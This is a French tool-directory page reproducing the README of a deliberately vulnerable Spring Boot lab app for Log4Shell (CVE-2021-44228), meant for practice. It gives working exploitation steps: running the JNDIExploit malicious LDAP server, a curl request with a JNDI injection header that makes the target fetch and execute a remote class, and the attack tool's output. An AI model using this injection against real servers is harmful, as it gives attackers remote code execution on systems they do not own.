Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4shell-vulnerable-app — Application web Spring Boot vulnérable à Log4Shell (CVE-2021-44228). | Kitploit
Outils/GitHubGitHub/prmawyer/log4shell-vulnerable-app
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubprmawyer/log4shell-vulnerable-app

log4shell-vulnerable-app

Application web Spring Boot vulnérable à Log4Shell (CVE-2021-44228).

Voir le dépôt
il y a 23 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exemple d'application vulnérable Log4Shell (CVE-2021-44228) - éditée deux fois

Ce dépôt contient une application web Spring Boot vulnérable à CVE-2021-44228, surnommée Log4Shell.

Elle utilise Log4j 2.14.1 (via spring-boot-starter-log4j2 2.6.1) et le JDK 1.8.0_181.

Exécution de l'application

Exécutez-la :

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

Étapes d'exploitation

Remarque : Ceci est fortement inspiré de l'avis original LunaSec. Exécutez à vos risques et périls, de préférence dans une machine virtuelle dans un environnement isolé.

Mise à jour (13 décembre) : Le dépôt JNDIExploit a été supprimé de GitHub (vraisemblablement, pas par GitHub)... Cliquez ici pour télécharger la version mise en cache par Wayback Machine.

  • Utilisez JNDIExploit pour lancer un serveur LDAP malveillant
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • Ensuite, déclenchez l'exploit en utilisant :
root@kitploit:~
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • Remarquez la sortie de JNDIExploit, montrant qu'il a envoyé une réponse LDAP malveillante et servi la charge utile de seconde étape :
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • Pour confirmer que l'exécution du code a réussi, remarquez que le fichier /tmp/pwned.txt a été créé dans le conteneur exécutant l'application vulnérable :
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

Référence

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contributeurs

@christophetd @rayhan0x01

Télécharger l’outil